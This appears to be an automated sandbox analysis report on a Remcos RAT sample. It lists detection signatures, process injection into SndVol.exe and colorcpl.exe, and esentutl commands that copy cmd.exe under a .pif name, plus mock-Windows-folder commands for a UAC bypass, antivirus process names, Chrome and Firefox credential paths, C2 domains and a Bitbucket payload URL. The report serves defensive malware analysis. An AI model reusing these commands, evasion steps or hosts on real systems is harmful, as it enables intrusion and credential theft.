Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02974168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_02974168
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_0297A65D
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02973B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_02973B44
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02973CD7 SetUnhandledExceptionFilter, 19_2_02973CD7

HIPS / PFW / Operating System Protection Evasion
barindex
Early bird code injection technique detected
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2920000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2940000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2460000 protect: page execute and read and write
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Thread APC queued: target process: C:\Windows\SysWOW64\SndVol.exe Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 6_2_02930F36
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 19_2_02950F36
Contains functionality to simulate mouse events
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02938754 mouse_event, 6_2_02938754
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe Jump to behavior
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DEB39A cpuid 0_2_02DEB39A
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02D35ACC
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: GetLocaleInfoA, 0_2_02D3A7C4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: GetLocaleInfoA, 0_2_02D3A810
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02D35BD8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 6_2_029712EA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_029713B7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 6_2_029710BA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 6_2_029670AE
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_029711E3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoA, 6_2_0292E679
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 6_2_02967597
Source: C:\Windows\SysWOW64\SndVol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 6_2_02970A7F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_02970E6A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 6_2_02970CF7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 6_2_02970DDD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 6_2_02970D42
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 9_2_00E38572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 9_2_00E36854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 9_2_00E39310
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 11_2_00E38572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 11_2_00E36854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 11_2_00E39310
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 15_2_02E25ACC
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 15_2_02E25BD7
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: GetLocaleInfoA, 15_2_02E2A810
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 19_2_029912EA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 19_2_029913B7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 19_2_029910BA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 19_2_029870AE
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 19_2_029911E3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoA, 19_2_0294E679
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW, 19_2_02987597
Source: C:\Windows\SysWOW64\SndVol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 19_2_02990A7F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 19_2_02990E6A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 19_2_02990CF7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 19_2_02990DDD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: EnumSystemLocalesW, 19_2_02990D42
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3920C GetLocalTime, 0_2_02D3920C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293A7A2 GetComputerNameExW,GetUserNameW, 6_2_0293A7A2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0296800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 6_2_0296800F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3B78C GetVersionExA, 0_2_02D3B78C
Source: C:\Windows\SysWOW64\SndVol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 6_2_0292B21B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 19_2_0294B21B
Contains functionality to steal Firefox passwords or cookies
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 6_2_0292B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \key3.db 6_2_0292B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 19_2_0294B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: \key3.db 19_2_0294B335

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Windows\SysWOW64\SndVol.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
Source: C:\Windows\SysWOW64\colorcpl.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
Yara detected Remcos RAT
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Windows\SysWOW64\SndVol.exe Code function: cmd.exe 6_2_02925042
Source: C:\Windows\SysWOW64\SndVol.exe Code function: cmd.exe 19_2_02945042
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569880 Sample: jW3NEKvxH1.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 58 zara.master-workdone.com.ua 2->58 60 manazara.master-workdone.com.ua 2->60 62 4 other IPs or domains 2->62 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 10 other signatures 2->84 9 jW3NEKvxH1.exe 1 6 2->9         started        14 Dlaybpxl.PIF 2->14         started        16 Dlaybpxl.PIF 2->16         started        signatures3 process4 dnsIp5 66 s3-w.us-east-1.amazonaws.com 3.5.30.3, 443, 49718 AMAZON-AESUS United States 9->66 68 bitbucket.org 185.166.143.50, 443, 49715, 49716 AMAZON-02US Germany 9->68 48 C:\Users\Public\Libraries\lxpbyalD.cmd, DOS 9->48 dropped 50 C:\Users\Public\Libraries\Dlaybpxl, data 9->50 dropped 52 C:\Users\Public\Dlaybpxl.url, MS 9->52 dropped 94 Early bird code injection technique detected 9->94 96 Allocates memory in foreign processes 9->96 98 Queues an APC in another process (thread injection) 9->98 100 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 9->100 18 SndVol.exe 3 9->18         started        22 cmd.exe 1 9->22         started        24 esentutl.exe 2 9->24         started        102 Multi AV Scanner detection for dropped file 14->102 27 SndVol.exe 14->27         started        29 colorcpl.exe 16->29         started        file6 signatures7 process8 dnsIp9 64 zara.master-workdone.com.ua 104.243.42.254, 49730, 49785, 49856 RELIABLESITEUS United States 18->64 86 Contains functionality to bypass UAC (CMSTPLUA) 18->86 88 Detected Remcos RAT 18->88 90 Contains functionalty to change the wallpaper 18->90 92 4 other signatures 18->92 31 esentutl.exe 2 22->31         started        35 alpha.pif 1 22->35         started        37 esentutl.exe 2 22->37         started        41 6 other processes 22->41 46 C:\Users\Public\Libraries\Dlaybpxl.PIF, PE32 24->46 dropped 39 conhost.exe 24->39         started        file10 signatures11 process12 file13 54 C:\Users\Public\alpha.pif, PE32 31->54 dropped 72 Drops PE files to the user root directory 31->72 74 Drops PE files with a suspicious file extension 31->74 76 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 31->76 43 xpha.pif 1 35->43         started        56 C:\Users\Public\xpha.pif, PE32 37->56 dropped signatures14 process15 dnsIp16 70 127.0.0.1 unknown unknown 43->70
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.243.42.254
 manazara.master-workdone.com.ua United States
23470 RELIABLESITEUS true
185.166.143.50
 bitbucket.org Germany
16509 AMAZON-02US false
3.5.30.3
 s3-w.us-east-1.amazonaws.com United States
14618 AMAZON-AESUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
s3-w.us-east-1.amazonaws.com 3.5.30.3 true
bitbucket.org 185.166.143.50 true
manazara.master-workdone.com.ua 104.243.42.254 true
zara.master-workdone.com.ua 104.243.42.254 true
bbuseruploads.s3.amazonaws.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke false
    		high
    manazara.master-workdone.com.ua true
    • Avira URL Cloud: safe
    		 unknown
    zara.master-workdone.com.ua true
    • Avira URL Cloud: safe
    		 unknown